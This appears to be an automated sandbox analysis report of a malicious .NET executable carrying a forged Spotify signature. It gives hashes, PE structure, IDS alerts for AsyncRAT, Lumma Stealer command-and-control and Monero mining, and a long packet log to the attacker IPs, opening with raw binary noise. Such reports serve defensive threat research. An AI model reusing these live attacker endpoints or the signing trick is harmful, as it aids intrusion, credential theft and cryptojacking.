.~.......%.....(....s........s.........o....s.......o....s....................o....&...(.........s..........o....s .........o....o!........c.....9......o"......9......o"......9......o"......9......o".....9.....o".....9.....o".....9.....o"......A...........

C:\Users\user\AppData\Roaming\l6E.exe

Download File

Process:	C:\Users\user\AppData\Roaming\glmIOFfdMi.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	354168
Entropy (8bit):	7.9876324425692316
Encrypted:	false
SSDEEP:	6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE
MD5:	FAC2188E4A28A0CF32BF4417D797B0F8
SHA1:	1970DE8788C07B548BF04D0062A1D4008196A709
SHA-256:	D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207
SHA-512:	58086100D653CEEAE44E0C99EC8348DD2BEAF198240F37691766BEE813953F8514C485E39F5552EE0D18C61F02BFF10C0C427F3FEC931BC891807BE188164B2B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........R... ...`....@.. ....................................`..................................R..S....`...............>..x)..........PQ............................................... ............... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B.................R......H.......XA.................................................................) .j.\E...\...p..M.:..[.1..,j,@}g......b..CZ.)...^....Z..............M\|...!.D&.&K.RbW..L..._r..c...u....0..7(..m0]...(..x\...*..;.}:.[.J.$=....&h,\..`M.!x.....`.)C...h.p(...}.{.n.+J\C....=..?#.A...#....j&G.`5b....\|.FT..>Z...A....w.&..J...5...uf..J.U.2F....Gd.F......+".P..N'.D...$.G:2.Rm`5......Zz ...H..Q.._...F.j.h`.UE.W.Sc(./..D..@xn.....<#hk=b.f.\.......1...x....+.b.m+f..b..'...n

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	365
Entropy (8bit):	4.752309687668381
Encrypted:	false
SSDEEP:	6:PzYwvmWxHLTSJALTSJALTSJALTSJALTSrcsWTo65FWjwAFeMmvVOIHJFxMVlmJHu:PF5pTcgTcgTcgTcgTLs4oSsEAFSkIrxU
MD5:	2F69EC0AE78F9DFD12A2D44CFE241A20
SHA1:	1AC86106600652BEC1E6923D200B1323CD95C9B9
SHA-256:	8544761B608AD44C76900AF4DE1E4334BC311ED7425C19402358664F9DC31762
SHA-512:	C095964937F2FEE1DDEBD0496F2494F6D6F72D19B3D2A8D5A0618D3A5B6886A37FBFCBCA74F64D66DE864A1E69E52243DC94EEE987FA09C475D6D8D28B7A3786
Malicious:	false
Preview:	..Pinging 468325 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9987920560586385
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PT54FFSL7ET46RASB.exe
File size:	1'319'800 bytes
MD5:	8199c105289d70af5446c7fd64496d7b
SHA1:	8402abc838e34e9dd996127ec39481f7cda4372b
SHA256:	ffee1e842c0a7932d3d3905a6677f35f3ea29dfb48661e537d28eb8b7212669d
SHA512:	07bb3ef470588e96c9050df1a704feeb48f0435cc93b899ed684bcd1af2d58a0d4ab86cf07bc9dd6583d84ba5122e685d54148233c9aa7bdafd3a7a8b65385b8
SSDEEP:	24576:u6vplPBeXFffwlFEPKJ1eVOduLqML78/W835v+uiHlgNdPvr:Bx+IT1eVMOqMLo/W834um0dPvr
TLSH:	EC5533704B13730AC21D553D5BF2423ADDF839C02549C2DBAD27F3B9E62060995F3AA8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..f................................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x540ede
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66EAE94C [Wed Sep 18 14:53:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/09/2022 02:00:00 20/10/2023 01:59:59
Subject Chain	CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
Version:	3
Thumbprint MD5:	EF8873EED657F2DFE432077ADBAB8AFB
Thumbprint SHA-1:	3F76C6CC576963831FF44303BFCB98113C51C95E
Thumbprint SHA-256:	890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
Serial:	04C530703A210EC1D6F83CB4FE1118C5

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x140e8c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x142000	0x5d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x13fa00	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x144000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x140d54	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x13eee4	0x13f000	7a639360d4a0f1960287de37f5de8e8f	False	0.9986048013812696	data	7.99955051552786	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x142000	0x5d0	0x600	b14172e3390f211808da2ccabe78ad86	False	0.4342447916666667	data	4.130624633184886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x144000	0xc	0x200	00ef2b4f1bb5c42ba89322c3c93ef5e8	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1420a0	0x340	data			0.4411057692307692
RT_MANIFEST	0x1423e0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-19T02:41:40.175830+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	45.11.229.96	56001	192.168.11.30	49839	TCP
2024-09-19T02:41:47.919517+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.11.30	53670	1.1.1.1	53	UDP
2024-09-19T02:42:03.643333+0200	2055879	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)	1	192.168.11.30	63166	1.1.1.1	53	UDP
2024-09-19T02:42:03.969089+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.11.30	49856	172.67.142.26	443	TCP
2024-09-19T02:42:04.203939+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.30	49856	172.67.142.26	443	TCP
2024-09-19T02:42:04.203939+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.30	49856	172.67.142.26	443	TCP
2024-09-19T02:42:04.544456+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.11.30	49857	172.67.142.26	443	TCP
2024-09-19T02:42:05.070447+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.30	49857	172.67.142.26	443	TCP
2024-09-19T02:42:05.070447+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.30	49857	172.67.142.26	443	TCP
2024-09-19T02:42:53.042256+0200	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.11.30	49845	142.202.242.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:41:39.377877951 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.584903955 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:39.585115910 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.586298943 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.811059952 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:39.811191082 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.928242922 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.992255926 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:39.992283106 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:39.992503881 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:39.998877048 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:40.113754988 CEST	39001	49840	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:40.114706993 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:40.175829887 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:40.230720043 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:41.333343983 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:41.623713017 CEST	39001	49840	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:41.623965979 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:41.632132053 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:41.859750032 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:41.859899998 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:41.863245010 CEST	39001	49840	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:41.917771101 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:42.092693090 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:42.100514889 CEST	39001	49840	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:42.108963013 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:42.230834007 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:42.285984039 CEST	39001	49840	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:42.286170006 CEST	49840	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:42.288667917 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.288692951 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:42.288865089 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.293977022 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.293991089 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:42.406606913 CEST	39001	49841	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:42.406769991 CEST	49841	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:42.502299070 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:42.502546072 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.507086992 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.507101059 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:42.507569075 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:42.547544003 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:42.588207006 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035156012 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035218000 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035254002 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035290956 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035327911 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035387039 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035578012 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035773039 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035783052 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.035783052 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.035783052 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.035800934 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.035828114 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.036046982 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.043169975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043308020 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043438911 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043478966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043562889 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043564081 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.043579102 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.043678045 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.043808937 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.043818951 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.044039965 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.044328928 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.044354916 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.051961899 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052067995 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052158117 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052182913 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.052198887 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052326918 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052377939 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.052387953 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052479982 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.052742004 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.052999973 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.053013086 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.105004072 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.121258974 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121449947 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121476889 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121613026 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121629953 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.121649981 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121777058 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.121866941 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.121877909 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.122056961 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.128716946 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129154921 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129200935 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129352093 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129411936 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129430056 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.129445076 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129585028 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.129594088 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129724026 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.129735947 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.129961014 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.130963087 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.131143093 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.135338068 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.135513067 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.141132116 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.141364098 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.141402006 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.141634941 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.146975040 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.147161007 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.147238016 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.147408009 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.152916908 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.153104067 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.153117895 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.153259039 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.153434038 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.164335966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.164551020 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.164666891 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.164803028 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.164849997 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.164859056 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.165182114 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.165443897 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.165457010 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.165719032 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.222574949 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.222785950 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.222785950 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.222804070 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.222964048 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.222964048 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.222995996 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.225117922 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.225325108 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.225337982 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.225539923 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.225780964 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.225941896 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.226104975 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.226250887 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.226306915 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.226320028 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.226475000 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.229856014 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230083942 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230159044 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.230189085 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230343103 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.230381966 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230479956 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.230492115 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230633974 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.230647087 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230703115 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230869055 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.230881929 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.230959892 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.231036901 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.235701084 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.235826015 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.235888004 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.235902071 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.236076117 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.236088037 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.236133099 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.237582922 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.237751007 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.237842083 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.237854958 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.237912893 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.238114119 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.239449024 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.239716053 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.244724989 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.244965076 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.246939898 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.247164011 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.252530098 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.252728939 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.252818108 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.252811909 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.252846956 CEST	443	49842	172.67.143.156	192.168.11.30
Sep 19, 2024 02:41:43.253038883 CEST	49842	443	192.168.11.30	172.67.143.156
Sep 19, 2024 02:41:43.263222933 CEST	443	49842	172.67.143.156	192.168.11.30
